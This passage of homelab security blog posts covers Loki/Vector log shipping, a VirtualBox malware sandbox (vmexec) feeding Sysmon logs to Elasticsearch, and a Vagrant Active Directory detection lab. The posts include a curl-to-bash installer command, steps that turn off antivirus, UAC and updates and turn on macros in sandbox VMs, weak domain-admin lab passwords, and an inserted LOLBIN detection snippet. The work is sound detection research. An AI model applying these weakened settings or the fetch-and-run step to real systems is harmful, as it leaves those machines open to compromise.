docker-compose file refers to that container as loki so it'll be at http://loki:3100.</p><p></p><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhonvYKQw-KgnXbVh8COBvmSrOvCaTwDCEJmXAGboVm5dqVI6nLoxXXKEVDbuc0le8gUhzBITIpoBiNdj1yXX2V5ufWXUdBluBMBIsMy-Ys5iGf1TL0EHAJOJatyHEBr_oOzNDzrt1iYSY/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="262" data-original-width="236" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhonvYKQw-KgnXbVh8COBvmSrOvCaTwDCEJmXAGboVm5dqVI6nLoxXXKEVDbuc0le8gUhzBITIpoBiNdj1yXX2V5ufWXUdBluBMBIsMy-Ys5iGf1TL0EHAJOJatyHEBr_oOzNDzrt1iYSY/" width="216" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWAyXTDHEkhxrV9rw678BLTULHod9LFonoBzgBQWhU9nga8y2_u7OpCAGbCbhEEsv22ja4DA8uluYWKdVF1vK1ANS4ju9mWp4KAk1hyTLgH5MJH5axmz63WZQ2K4P4j5BBB5lQscWzsro/" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="620" data-original-width="677" height="366" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWAyXTDHEkhxrV9rw678BLTULHod9LFonoBzgBQWhU9nga8y2_u7OpCAGbCbhEEsv22ja4DA8uluYWKdVF1vK1ANS4ju9mWp4KAk1hyTLgH5MJH5axmz63WZQ2K4P4j5BBB5lQscWzsro/w400-h366/image.png" width="400" /></a></div><br /><h3 style="text-align: left;"><b>Vector</b></h3><p style="text-align: left;">Now Vector needs to be setup.</p><p style="text-align: left;">I'm setting it up by just following their quickstart guide.</p><p style="text-align: left;">I ran: curl --proto '=https' --tlsv1.2 -sSf https://sh.vector.dev | bash</p><p style="text-align: left;">Default config file is located at ~/.vector/config/vector.toml</p><p style="text-align: left;">Here's my config for syslog source and loki sink:</p><p style="text-align: left;"><a 
href="https://gist.github.com/BoredHackerBlog/de8294818027d450ecc2aed9c94c5260">https://gist.github.com/BoredHackerBlog/de8294818027d450ecc2aed9c94c5260</a></p><p style="text-align: left;">I modified the syslog port to be 1514 so I can run vector as a non-privileged user and I also changed mode to udp.</p><p style="text-align: left;">For the loki sink, a label is required but your label key and value can be anything you prefer. I could have done labels.system = "unifi" and it would work just fine.</p><p style="text-align: left;">Once configuration is done, the following command can be run to start vector: vector --config ~/.vector/config/vector.toml</p><h3 style="text-align: left;"><b>Unifi controller</b></h3><p style="text-align: left;">In unifi controller settings, the remote logging option is under Settings -> System -> Application Configuration -> Remote Logging</p><p style="text-align: left;">Here's what my configuration looks like:</p><p style="text-align: left;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNPN1I1eIF4CK4YbNMAJemuwxeK9y34N1lEl35Xr0nPYdEphyUfay6Bcd_3muov4IzPFcuxRlpqijelWv_JdrY124WGhA6ugSj14pUORl7bppnzBwhXIZcHZg57di-P1ACBUUSZzWJBlw/" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="835" data-original-width="683" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNPN1I1eIF4CK4YbNMAJemuwxeK9y34N1lEl35Xr0nPYdEphyUfay6Bcd_3muov4IzPFcuxRlpqijelWv_JdrY124WGhA6ugSj14pUORl7bppnzBwhXIZcHZg57di-P1ACBUUSZzWJBlw/w327-h400/image.png" width="327" /></a></div><p></p><p style="text-align: left;">Click Apply to apply changes and the logs should flow to vector and into loki.</p><p style="text-align: left;"><br /></p><p style="text-align: left;"></p><div class="separator" style="clear: both; text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7EE_R9i_tk9bwxc4MllKPRPZ3zRzQawcLGWwnugnkQ_50naN2VH9N7kSzD4iOQmKwVe1xJaG9a8K7xhwfFup-KcZ9T4Pym5SXPsJeuw8unanSq1342lHeNEWYS9OoVXdRe9r6vtciERA/" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="739" data-original-width="1167" height="405" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7EE_R9i_tk9bwxc4MllKPRPZ3zRzQawcLGWwnugnkQ_50naN2VH9N7kSzD4iOQmKwVe1xJaG9a8K7xhwfFup-KcZ9T4Pym5SXPsJeuw8unanSq1342lHeNEWYS9OoVXdRe9r6vtciERA/w640-h405/image.png" width="640" /></a></div><br /><p></p><p style="text-align: left;"><br /></p><p style="text-align: left;"><b>!!!</b></p><h3 style="text-align: left;"><b>no logs in grafana query</b></h3><p style="text-align: left;">I did have a weird issue where logs didn't show up in a grafana query but would show up when I did a live query.</p><p style="text-align: left;">I ran "sudo timedatectl set-timezone America/New_York" to update my timezone and that fixed the issue. 
(or it didn't, but I think it did because queries did show results after I ran this)</p><p style="text-align: left;"><b>!!!</b></p><div><h2 style="text-align: left;"><b>Resources</b></h2><p><a href="https://grafana.com/oss/loki/">https://grafana.com/oss/loki/</a></p><p><a href="https://techno-tim.github.io/posts/grafana-loki/">https://techno-tim.github.io/posts/grafana-loki/</a></p><p><a href="https://www.youtube.com/watch?v=h_GGd7HfKQ8">https://www.youtube.com/watch?v=h_GGd7HfKQ8</a></p><p><a href="https://grafana.com/docs/loki/latest/installation/docker/">https://grafana.com/docs/loki/latest/installation/docker/</a></p><p><a href="https://grafana.com/docs/loki/latest/logql/log_queries/">https://grafana.com/docs/loki/latest/logql/log_queries/</a></p><p><a href="https://vector.dev/">https://vector.dev/</a></p><p><a href="https://vector.dev/docs/reference/configuration/sources/syslog/">https://vector.dev/docs/reference/configuration/sources/syslog/</a></p><p><a href="https://vector.dev/docs/reference/configuration/sinks/loki/">https://vector.dev/docs/reference/configuration/sinks/loki/</a></p><p><a href="https://grafana.com/blog/2019/08/22/homelab-security-with-ossec-loki-prometheus-and-grafana-on-a-raspberry-pi/">https://grafana.com/blog/2019/08/22/homelab-security-with-ossec-loki-prometheus-and-grafana-on-a-raspberry-pi/</a></p><p><a href="https://support.rocketcyber.com/hc/en-us/articles/360017917457-How-do-I-configure-syslog-remote-logging-for-a-Ubiquiti-Unifi-Security-Gateway-USG-">https://support.rocketcyber.com/hc/en-us/articles/360017917457-How-do-I-configure-syslog-remote-logging-for-a-Ubiquiti-Unifi-Security-Gateway-USG-</a></p><p><br /></p><p><br /></p></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8341113811870246566.post-50453790565028195142021-04-10T14:22:00.000-07:002021-04-10T14:22:19.688-07:00Creating a malware sandbox for sysmon and windows event logs with virtualbox and vmexec<h2 style="text-align: left;">Introduction</h2><p>I was doing 
some research around detection related to maldoc/initial access. Usually, I've seen malicious Word or Excel documents and in some cases compressed files containing a Word document, Excel document, script, or an executable. In a lot of cases LOLBIN/LOLBAS are abused. You can see this happening a lot in sandbox (anyrun, VT dynamic, hatching triage, etc..) outputs as well.</p><p>I came across some guidance around blocking some LOLBIN/LOLBAS files with Windows Firewall to prevent some of the initial compromise activity. There are multiple scripts and blog posts related to this. Essentially, Windows Firewall rules are added to prevent some of the executables from connecting to the internet.</p><p>Scripts/Blogs:</p><p>https://daniel.streefkerkonline.com/2017/10/24/mitigate-commodity-malware-attacks-with-windows-firewall-rules/</p><p>https://call4cloud.nl/2020/07/the-windows-firewall-rises/</p><p>https://gist.github.com/ricardojba/ecdfe30dadbdab6c514a530bc5d51ef6#file-windows_hardening-cmd-L497</p><p>https://gist.github.com/jaredhaight/e88b4323adce06395dace501841d3075#file-windows_hardening-cmd-L108</p><p><br /></p><p>I also saw posts where Olaf Hartong was discussing data from sandboxes related to malware and LOLBIN/LOLBAS usage and rundll32 as well.</p><p>https://twitter.com/olafhartong/status/1359235339332780034</p><p>https://twitter.com/olafhartong/status/1361415502447267842</p><p><br /></p><p>I thought it would be interesting to collect data on my own and have my own dataset to play with. I also wanted the ability to test malware in an environment where some hardening was applied, such as mentioned in the blog posts and scripts above. In addition to that, I wanted to have the ability to have an EDR agent or AV agent in the same sandbox to see what it collects or alerts on in its management console. I ended up writing vmexec to help me with this.</p><p>vmexec is similar to cuckoo sandbox and cape sandbox but it doesn't get any information back from the VM's. 
It just puts the executable in the VM and executes it. When you upload the sample, you can pick a VM or use any available VM and set how long the VM will run for after the sample is uploaded. It uses virtualbox for VM's and, just like cuckoo or cape, you need to have an agent inside the VM.</p><p>https://github.com/BoredHackerBlog/vmexec</p><p><br /></p><h2 style="text-align: left;">Design</h2><p>I'll be using a Windows 10 VM with various logging enabled and sysmon installed. I'm using sysmon-modular rules (https://github.com/olafhartong/sysmon-modular). </p><p>For forwarding logs, I'll be using winlogbeat OSS. (https://www.elastic.co/downloads/beats/winlogbeat-oss) I'm using the OSS version because I'll be using the Open Distro for Elasticsearch elasticsearch and kibana containers. (https://opendistro.github.io/for-elasticsearch/)</p><p>Since I'll be running malware, I'll have to have a second VM for routing the malicious traffic, but it's not required if you're okay with threat actors potentially seeing your connections. 
You can always set up the sandbox VM in a way it doesn't route any traffic as well.</p><p>The network and VM design kinda looks like this:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_XFFsG4YaCdsAaCgcQ4oDCzaiQsfZUt_LhXEwXL-O3d1Rip5YMucxxIK8w0TCddXuzJ8pU6Wc9lfzDuVH3c4IhW-k_p-CkRDtrw5hYOpoWJJvuT-TDi6mOndk1dFYLnXnfyurYUi0-lM/" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="415" data-original-width="407" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_XFFsG4YaCdsAaCgcQ4oDCzaiQsfZUt_LhXEwXL-O3d1Rip5YMucxxIK8w0TCddXuzJ8pU6Wc9lfzDuVH3c4IhW-k_p-CkRDtrw5hYOpoWJJvuT-TDi6mOndk1dFYLnXnfyurYUi0-lM/w627-h640/image.png" width="627" /></a></div><br /><br /><p></p><h2 style="text-align: left;">Setup</h2><p>Getting all the packages and dependencies:</p><p></p><ol style="text-align: left;"><li>Install Ubuntu 20.04 (although pretty much any Linux OS should work)</li><li>Install Docker (https://get.docker.com/)</li><li>Install docker-compose (https://docs.docker.com/compose/install/)</li><li>Install Virtualbox (https://linuxize.com/post/how-to-install-virtualbox-on-ubuntu-20-04/)</li><li>Make sure python3 and python3-pip are installed</li><ol><li>Might have to run apt install python3 python3-pip</li></ol><li>Install python packages</li><ol><li>Run the commands below:</li><ol><li>pip3 install flask</li><li>pip3 install flask-sqlalchemy</li><li>pip3 install flask-admin</li></ol></ol><li>Download vmexec https://github.com/BoredHackerBlog/vmexec</li><ol><li>if you have git installed you can run:</li><ol><li>git clone https://github.com/BoredHackerBlog/vmexec</li></ol></ol></ol><div><br /></div><div>Getting Elastic and Kibana up and running:</div><p></p><p>I'm using a docker-compose file for elastic and kibana. 
</p><pre style="font-family: courier; font-size: x-small;">research@workstation13:~/elk$ cat docker-compose.yml
version: '3'
services:
  odfe-node1:
    image: amazon/opendistro-for-elasticsearch:1.13.1
    container_name: odfe-node1
    environment:
      - discovery.type=single-node
      - bootstrap.memory_lock=true # along with the memlock settings below, disables swapping
      - "ES_JAVA_OPTS=-Xms512m -Xmx512m" # minimum and maximum Java heap size, recommend setting both to 50% of system RAM
    ulimits:
      memlock:
        soft: -1
        hard: -1
      nofile:
        soft: 65536 # maximum number of open files for the Elasticsearch user, set to at least 65536 on modern systems
        hard: 65536
    volumes:
      - odfe-data1:/usr/share/elasticsearch/data
    ports:
      - 9200:9200
    networks:
      - odfe-net
  kibana:
    image: amazon/opendistro-for-elasticsearch-kibana:1.13.1
    container_name: odfe-kibana
    ports:
      - 5601:5601
    expose:
      - "5601"
    environment:
      ELASTICSEARCH_URL: https://odfe-node1:9200
      ELASTICSEARCH_HOSTS: https://odfe-node1:9200
    networks:
      - odfe-net

volumes:
  odfe-data1:

networks:
  odfe-net:
</pre><p><br /></p><p>In the docker-compose.yml file shown above, the data is being stored in odfe-data1 volume. 
When you take down the containers and bring them up again, the data will not go away. </p><p>Additional information about the opendistro for elastic docker container and settings can be found here: https://opendistro.github.io/for-elasticsearch-docs/docs/install/docker/</p><p>cd into the directory that contains the docker-compose.yml file and run docker-compose up -d to start the containers in the background. To take down the containers, you can run docker-compose down from the same directory.</p><p>Once you bring up the containers, elastic will be running on port 9200 and kibana will be on 5601.</p><p><br /></p><p>Setting up Windows 10 Sandbox</p><p style="text-align: left;"></p><ol style="text-align: left;"><li>Create a Windows 10 VM in virtualbox</li><li>Disable updates</li><li>Disable antivirus</li><li>Disable UAC</li><li>Disable anything else that's not needed</li><li>Install whatever applications you need, such as a pdf reader or Office</li><ol><li>If you're using Office (Word or Excel), make sure macros are allowed to run automatically (https://support.microsoft.com/en-us/topic/enable-or-disable-macros-in-office-files-12b036fd-d140-4e74-b45e-16fed1a7e5c6)</li></ol><li>Install Python 3+</li><li>Copy agent.py from the vmexec project into the VM (do not run it yet)</li></ol><div>These should help with disabling some things: https://github.com/BoredHackerBlog/LogDetectionLab/blob/main/change_sec_config.bat</div><div><br /></div><div>https://github.com/BoredHackerBlog/loggingstuff/blob/main/loggingstuff.bat</div><div><br /></div><div>Setting up logging and log forwarding:</div><div><ol style="text-align: left;"><li>Download sysmon and install Sysmon with sysmon-modular rules (see the loggingstuff.bat link above)</li><li>Enable process auditing and powershell logging (https://redblueteam.wordpress.com/2020/02/08/enable-command-line-and-powershell-audit-for-better-threat-hunting/)</li><li>Download and install winlogbeat oss</li><ol><li>configure winlogbeat oss to forward logs to 
192.168.56.1, which is where elastic will be running once we create host-only adapter</li></ol></ol></div><div><br /></div><div><br /></div><div>After the base VM is setup, there are some network modifications that are needed.</div><div><br /></div><div>You will need to create a host-only adapter without dhcp server enabled.</div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghtJ1bBz3LsZYjhPNA5SVHi3czRwSaNrheCL-IMcCd1x_SXMMs33L1erMZFJJHUXUXb_K1NPD7p6xtpRPobGr8-9-1yLnwd-VKFlKmZL9h6E9DV12HMcrgx5uDJHb0aoBlbfr-Hlm8N_w/" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="535" data-original-width="899" height="381" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghtJ1bBz3LsZYjhPNA5SVHi3czRwSaNrheCL-IMcCd1x_SXMMs33L1erMZFJJHUXUXb_K1NPD7p6xtpRPobGr8-9-1yLnwd-VKFlKmZL9h6E9DV12HMcrgx5uDJHb0aoBlbfr-Hlm8N_w/w640-h381/image.png" width="640" /></a></div><br />Enable the second NIC on the VM and attach it to host-only adapter.</div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIH29LH3ZUEPhu3RUs0vK8bZKmELGfKShDJgvol0oJuKpo0O6B9fvLvzxgiZlWunu-sHHG90fgKPtBUh-PXc-N-PVo-zk_EYaw6m-ff9M0VhuzlW5AsiQckQL_J1Kt8E7AXFDvIlrgMS0/" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="261" data-original-width="611" height="274" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIH29LH3ZUEPhu3RUs0vK8bZKmELGfKShDJgvol0oJuKpo0O6B9fvLvzxgiZlWunu-sHHG90fgKPtBUh-PXc-N-PVo-zk_EYaw6m-ff9M0VhuzlW5AsiQckQL_J1Kt8E7AXFDvIlrgMS0/w640-h274/image.png" width="640" /></a></div><br />Set the first NIC/adapter to NAT or internal network or whatever else. 
I have mine setup to internal network going to my router.</div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbzkWJ-RukRcfIiB8Y8TGVj0TUEuxIx5CVXrWiKQ1CB8-PdelTN8wgAPmfmZKmwUGFbrUYlzjeFdWk0D8da1U9kmjFNwl74H2ul42aEQCQrB_cJ85LDznJgkvZN8YLsnAK8GG_FdwN_AQ/" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="234" data-original-width="597" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbzkWJ-RukRcfIiB8Y8TGVj0TUEuxIx5CVXrWiKQ1CB8-PdelTN8wgAPmfmZKmwUGFbrUYlzjeFdWk0D8da1U9kmjFNwl74H2ul42aEQCQrB_cJ85LDznJgkvZN8YLsnAK8GG_FdwN_AQ/w400-h156/image.png" width="400" /></a></div><br />Finally, turn on the VM, set a static IP for the adapter in Windows. Since my vboxnet0 host-only adapter is using 192.168.56.1/1 I set my IP to 192.168.56.2.</div><div><br /></div><div>Reboot the VM, login and run agent.py and take a snapshot while the VM is running. Note the IP address, snapshot name, and VM name.</div><div><br /></div><div>Setting up vmexec</div><div>in app.py, just search for #CHANGEME and modify the settings there.</div><p></p><p>You'll want to add your VM like this:</p><p>db.session.add(VMStatus(name="winVM",ip="10.0.0.178",snapshot="Snapshot2", available=True))</p><p>name is the name you gave your VM in virtualbox, IP is the static IP that was assigned, and snapshot is the snapshot you're utilizing.</p><p><br /></p><h2 style="text-align: left;">Usage</h2><p>To start using vmexec, you need the docker containers for elastic and kibana running (cd into the directory with your docker-compose.yml file and type docker-compose up -d), you need your router VM up and running. You can just start the VM. Finally, you need to start vmexec. 
cd into the vmexec directory and type flask run -h 0.0.0.0 (if you want to remotely access the web server); the web server will be running on port 5000.</p><p>The web UI looks like this:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXz2qAxoxzBcWu3lhXfo923GrVZ7bMNFYsURutRdVhBrJHh_ExhIxvGD_4qG54ivdxShHzns1zdjaKN4xaxIZ-q-Kr74WdRzt5BbA6RLrMFFoBfBoRgqzLezHN3dRRhNyYp8nbbnmNf1s/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="116" data-original-width="336" height="110" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXz2qAxoxzBcWu3lhXfo923GrVZ7bMNFYsURutRdVhBrJHh_ExhIxvGD_4qG54ivdxShHzns1zdjaKN4xaxIZ-q-Kr74WdRzt5BbA6RLrMFFoBfBoRgqzLezHN3dRRhNyYp8nbbnmNf1s/" width="320" /></a></div><br />You can select and upload a file, select a specific VM from the dropdown menu (optional), change the VM run time, and click the submit button.<p></p><p><br /></p><p>You can access kibana on port 5601 via web browser. Make sure to set up your index pattern. It should be winlogbeat-*.</p><p><br /></p><p>In kibana you can search for the executable file that was run and look at surrounding events. 
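</p><p>As an added example, not part of this post or the vmexec project: the kind of check you would run in that Kibana search, done offline in Python over a few constructed winlogbeat-style Sysmon events (event 1 process creation, event 3 network connection). The field layout follows winlogbeat's winlog.event_id / winlog.event_data documents; the LOLBIN, Office and script-host lists are assumptions, not a complete LOLBAS list.</p>

```python
import json

# Assumed lists (not from the post): a few LOLBINs that show up in the sandbox
# outputs mentioned above, Office hosts, and the script hosts a maldoc tends to spawn.
LOLBINS = {"rundll32.exe", "mshta.exe", "regsvr32.exe", "certutil.exe",
           "wscript.exe", "cscript.exe", "bitsadmin.exe", "msiexec.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}


def _basename(path):
    """Lower-cased file name of a Windows path: 'C:\\Windows\\x.exe' -> 'x.exe'."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_events(events):
    """Return findings for winlogbeat-shaped Sysmon events.

    Sysmon event 1 is process creation, event 3 is a network connection; the
    fields are read from winlog.event_id and winlog.event_data as winlogbeat
    ships them into the winlogbeat-* index.
    """
    findings = []
    for ev in events:
        win = ev.get("winlog", {})
        data = win.get("event_data", {})
        image = _basename(data.get("Image", ""))
        if win.get("event_id") == 1:
            parent = _basename(data.get("ParentImage", ""))
            if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
                findings.append({"rule": "office_spawns_script_host",
                                 "parent": parent, "image": image,
                                 "cmdline": data.get("CommandLine", ""),
                                 "pid": data.get("ProcessId")})
        elif win.get("event_id") == 3:
            # Only outbound connections a LOLBIN initiated itself are interesting here.
            if image in LOLBINS and data.get("Initiated") == "true":
                dest = data.get("DestinationIp", "") + ":" + data.get("DestinationPort", "")
                findings.append({"rule": "lolbin_outbound_connection",
                                 "image": image, "dest": dest,
                                 "pid": data.get("ProcessId")})
    return findings


def pids_to_pivot_on(findings):
    """Process ids worth pulling the surrounding events for."""
    return sorted({f["pid"] for f in findings if f.get("pid")})


# Constructed sample events (not real sandbox output), shaped like winlogbeat documents.
SAMPLE_EVENTS = [
    {"winlog": {"event_id": 1, "event_data": {
        "Image": "C:\\Windows\\System32\\cmd.exe",
        "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
        "CommandLine": "cmd.exe /c rundll32 C:\\Users\\Public\\x.dll,Run",
        "ProcessId": "4120"}}},
    {"winlog": {"event_id": 1, "event_data": {
        "Image": "C:\\Windows\\System32\\rundll32.exe",
        "ParentImage": "C:\\Windows\\System32\\cmd.exe",
        "CommandLine": "rundll32 C:\\Users\\Public\\x.dll,Run",
        "ProcessId": "4188"}}},
    {"winlog": {"event_id": 3, "event_data": {
        "Image": "C:\\Windows\\System32\\rundll32.exe", "Initiated": "true",
        "DestinationIp": "203.0.113.10", "DestinationPort": "443",
        "ProcessId": "4188"}}},
    {"winlog": {"event_id": 3, "event_data": {
        "Image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe", "Initiated": "true",
        "DestinationIp": "198.51.100.7", "DestinationPort": "443",
        "ProcessId": "1200"}}},
]

if __name__ == "__main__":
    print(json.dumps(analyze_events(SAMPLE_EVENTS), indent=2))
```

<p>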
With sysmon-modular rules, you can also match events with mitre framework.</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZLb4U0yc5-HoqVvgcEDx25Fy1Y-lVNalmrFJ4qgT8XmasPMZwdVJHijHE8fU4LlKnOF5m6SVd9vZfAMQC34BkrenTAg91R0UPd78wUQsCcuj9_Qlo7v-t1iffcjOdAqIobwhB8-Mz94o/" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="471" data-original-width="1053" height="286" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZLb4U0yc5-HoqVvgcEDx25Fy1Y-lVNalmrFJ4qgT8XmasPMZwdVJHijHE8fU4LlKnOF5m6SVd9vZfAMQC34BkrenTAg91R0UPd78wUQsCcuj9_Qlo7v-t1iffcjOdAqIobwhB8-Mz94o/w640-h286/image.png" width="640" /></a></div><br /><br /><p></p><p><br /></p><h2 style="text-align: left;">Modifying the project</h2><p>Modifying the project is easy depending on your needs. Agent.py can be modified easily if you would like to upload files to specific location or execute/open them in a certain way. There could be code added in vm_process function as well if additional steps need to be taken before running the VM or the file or after.</p><p><br /></p><h2 style="text-align: left;">Resources</h2><p>https://cuckoosandbox.org/</p><p>https://github.com/kevoreilly/CAPEv2</p><p>https://github.com/BoredHackerBlog/capev2-virtualbox-install</p><p>https://github.com/BoredHackerBlog/vmexec</p><p>https://www.docker.com/</p><p>https://opendistro.github.io/for-elasticsearch/</p><p>https://www.elastic.co/downloads/beats/winlogbeat-oss</p><p>https://github.com/olafhartong/sysmon-modular</p><p>https://www.virtualbox.org/</p><p><br /></p><p><br /></p>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8341113811870246566.post-79957371760158839892021-01-30T11:40:00.000-08:002021-01-30T11:40:00.011-08:00Creating an Active Directory (AD) lab for log-based detection research and development with Vagrant, Humio, and AtomicRedTeam<h2 style="text-align: left;">introduction</h2><div>Few years or months 
ago, I came across DetectionLab project and thought it was neat. It would let me conduct attacks and let me work on detection rules and also let me test detection rules. DetectionLab uses Splunk for storing logs which I'm not used to and it also requires a lot of system resources my machine doesn't have. </div><div><br /></div><div>I then came across DetectionLabELK, which is similar to DetectionLab but uses ELK stack, which I am familiar with but I have the same issue with system requirements and not needing some of the components of the project. DetectionLabELK people (CyberDefenders) provide a cloud version of it which is very cheap if you wanted to utilize it for testing things but I still wanted to have something on my own machine.</div><div><br /></div><div>I did build an AD lab manually, however, after not taking snapshots and breaking the lab, I decided that I should just use Vagrant.</div><div><br /></div><div>For my lab needs, I just need to look at logs and not network traffic. I also just need one DC, one Workstation, and a Kali VM. I'm very familiar with using Humio so I decided to use Humio cloud (free) account to store and search my logs. Kali is good for doing certain attacks but I also wanted AtomicRedTeam so I could use that for generating log data and testing queries. 
The AD lab I made was also inspired by Applied Purple Teaming course and TheCyberMentor ethical hacking course.</div><div><br /></div><h2 style="text-align: left;">design</h2><div>Domain: testlab.local</div><div>Computers: dc1 - 192.168.200.11 - windows server 2019 desktop</div><div>workstation1 - 192.168.200.12 - windows 10</div><div>kali - no IP initially, you have to set it to 192.168.200.13 - kali linux</div><div><br /></div><div>Users:</div><div>local user: vagrant / vagrant works on all machines</div><div>domain users: </div><div>jsmith / Password123</div><div>jdoe / 123Password</div><div>SQLService / Servicepass123</div><div><br /></div><div>all domain users are in domain admins group, administrators group, and enterprise admins group.</div><div><br /></div><div>jsmith is a local admin on workstation1</div><h2 style="text-align: left;">setup</h2><div>system requirements:</div><div>any modern 4 core 8 thread CPU should be fine. I'm using i7-6700HQ.</div><div>around 16GB of RAM should work fine as well.</div><div><br /></div><div>virtualbox download and installation:</div><div>Download and install virtualbox from here: <a href="https://www.virtualbox.org/wiki/Downloads">https://www.virtualbox.org/wiki/Downloads</a></div><div>Install Oracle VM VirtualBox Extension Pack as well.</div><div><br /></div><div>vagrant download and installation:</div><div>Download and install vagrant from here: https://www.vagrantup.com/downloads</div><div>Once vagrant is installed, open command line and run: "vagrant plugin install vagrant-reload" to install the reload plugin. 
More info here: <a href="https://github.com/aidanns/vagrant-reload">https://github.com/aidanns/vagrant-reload</a></div><div><br /></div><div>downloading the github project:</div><div>Code/scripts are here: <a href="https://github.com/BoredHackerBlog/LogDetectionLab">https://github.com/BoredHackerBlog/LogDetectionLab</a></div><div>Download the zip and unzip it or run git clone <a href="https://github.com/BoredHackerBlog/LogDetectionLab">https://github.com/BoredHackerBlog/LogDetectionLab</a></div><div><br /></div><div>setting up humio:</div><div>Get a Humio account and login at <a href="http://cloud.humio.com">cloud.humio.com</a></div><div>Go to <a href="https://cloud.humio.com/sandbox/settings/ingest-tokens">https://cloud.humio.com/sandbox/settings/ingest-tokens</a></div><div>Create a new token for this project. You can leave the parser as None. Copy the token.</div><div>Edit winlogbeat.yml file and change the password to your token.</div><h2 style="text-align: left;">usage</h2><div>Vagrant command line guide: <a href="https://www.vagrantup.com/docs/cli">https://www.vagrantup.com/docs/cli</a></div><div><br /></div><div>Open command prompt and cd into the LogDetectionLab folder.</div><div>Type vagrant up to bring up all 3 virtual machines.</div><div>Your initial run will download the VM boxes and set everything up. This may take 30 minutes to an hour. 
</div><div><br /></div><div>Once all the machines are up and running and vagrant command exits in command prompt, you will need to login into kali linux VM and change eth1 IP to 192.168.200.13.</div><div><br /></div><div>You will have to disable Defender on workstation1 and install invoke-atomicredteam manually (check github page for bugs).</div><div><br /></div><div>For using invoke-atomicredteam, you will need to open powershell and run: Import-Module "C:\AtomicRedTeam\invoke-atomicredteam\Invoke-AtomicRedTeam.psd1" -Force</div><div><br /></div><div>You can also do vagrant up MACHINENAME, such as vagrant up dc1.</div><div><br /></div><div>To tear down the lab, you need to run vagrant destroy -f. This will shutdown the VMs and remove them.</div><div><br /></div><div>Vagrant also supports making snapshots and you can read more about that here: <a href="https://www.vagrantup.com/docs/cli/snapshot">https://www.vagrantup.com/docs/cli/snapshot</a></div><h2 style="text-align: left;">modifying the project</h2><div>Vagrantfile - this can be changed to modify VM cpu and memory resources, how port forwarding works, hostname, ip address, and scripts that run.</div><div><br /></div><div>install-dc.ps1 - domain controller promotion script</div><div><br /></div><div>join-domain.ps1 - joins the computer to the domain and adds jsmith as a local admin</div><div><br /></div><div>create-users.ps1 - creates users on the dc</div><div><br /></div><div>create-smbshare.ps1 - create an smb share on the dc</div><div><br /></div><div>change_ui.ps1 - changes some Windows setting so ui is adjusted to best performance</div><div><br /></div><div>change_sec_config.bat - disable updates, disable firewall, disable defender, disable uac, and enable rdp</div><div><br /></div><div>install-atomicredteam.ps1 - installs invoke-atomicredteam</div><div><br /></div><div>enable_logging.bat - enables a bunch of logging stuff, installs sysmon with olafhartong config, and downloads winlogbeat</div><div><br 
